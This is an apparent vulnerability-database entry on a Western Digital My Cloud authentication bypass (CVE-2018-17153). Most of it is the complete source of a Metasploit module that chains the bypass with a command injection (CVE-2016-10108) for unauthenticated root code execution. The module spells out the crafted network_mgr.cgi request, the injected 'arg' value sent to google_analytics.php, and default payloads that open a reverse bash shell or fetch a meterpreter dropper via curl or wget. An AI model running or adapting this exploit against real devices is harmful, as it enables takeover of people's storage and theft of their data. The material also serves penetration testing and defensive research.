var-201809-0306
Vulnerability from variot
It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called "cgi_get_ipv6" that starts an admin session, tied to the IP address of the user making the request, if the additional parameter "flag" with the value "1" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Western Digital MyCloud unauthenticated command injection',
        'Description' => %q{
          This module exploits authentication bypass (CVE-2018-17153) and
          command injection (CVE-2016-10108) vulnerabilities in Western
          Digital MyCloud before 2.30.196 in order to achieve
          unauthenticated remote code execution as the root user.

          The module first performs a check to see if the target is
          WD MyCloud. If so, it attempts to trigger an authentication
          bypass (CVE-2018-17153) via a crafted GET request to
          /cgi-bin/network_mgr.cgi. If the server responds as expected,
          the module assesses the vulnerability status by attempting to
          exploit a command injection vulnerability (CVE-2016-10108) in
          order to print a random string via the echo command. This is
          done via a crafted POST request to /web/google_analytics.php.

          If the server is vulnerable, the same command injection vector
          is leveraged to execute the payload.

          This module has been successfully tested against Western Digital
          MyCloud version 2.30.183.

          Note: based on the available disclosures, it seems that the
          command injection vector (CVE-2016-10108) might be exploitable
          without the authentication bypass (CVE-2018-17153) on versions
          before 2.21.126. The obtained results on 2.30.183 imply that
          the patch for CVE-2016-10108 did not actually remove the command
          injection vector, but only prevented unauthenticated access to it.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Erik Wynter', # @wyntererik - Metasploit
          'Steven Campbell', # CVE-2016-10108 disclosure and PoC
          'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC
        ],
        'References' => [
          ['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.
          ['CVE', '2018-17153'], # authentication bypass
          ['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC
          ['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Platform' => %w[linux unix],
        'Arch' => [ ARCH_ARMLE, ARCH_CMD ],
        'Targets' => [
          [
            'Unix In-Memory',
            {
              'Platform' => [ 'unix', 'linux' ],
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
              'Type' => :unix_memory
            }
          ],
          [
            'Linux Dropper', {
              'Arch' => [ARCH_ARMLE],
              'Platform' => 'linux',
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
                'CMDSTAGER::FLAVOR' => :curl
              },
              'Type' => :linux_dropper
            }
          ]
        ],
        'CmdStagerFlavor' => ['curl', 'wget'],
        'Privileged' => true,
        'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),
    ])
  end

  def check
    # sanity check to see if the target is likely WD MyCloud
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    })

    return CheckCode::Unknown('Connection failed.') unless res

    return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')

    print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")
    # try the authentication bypass (CVE-2018-17153)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),
      'vars_get' => {
        'cmd' => 'cgi_get_ipv6',
        'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details
      }
    })

    return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res

    return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404

    # send a command to print a random string via echo. if the target is vulnerable,
    # both the command and the command output will be part of the response body
    echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"
    print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")
    res = execute_command(echo_cmd, { 'wait_for_response' => true })

    return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res

    return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')

    CheckCode::Safe('The target failed to execute the echo command.')
  end

  def execute_command(cmd, opts = {})
    request_hash = {
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),
      'cookie' => 'username=admin',
      'vars_post' => {
        'cmd' => 'set',
        'opt' => 'cloud-device-num',
        'arg' => "0|echo `#{cmd}` #"
      }
    }

    return send_request_cgi(request_hash) if opts['wait_for_response']

    # if we are trying to execute the payload, we can just send it to the server
    # and return without waiting for a response
    send_request_cgi(request_hash, 0)
  end

  def exploit
    if target.arch.first == ARCH_CMD
      print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...")
      execute_command(payload.encoded)
    else
      execute_cmdstager(background: true)
    end
  end
end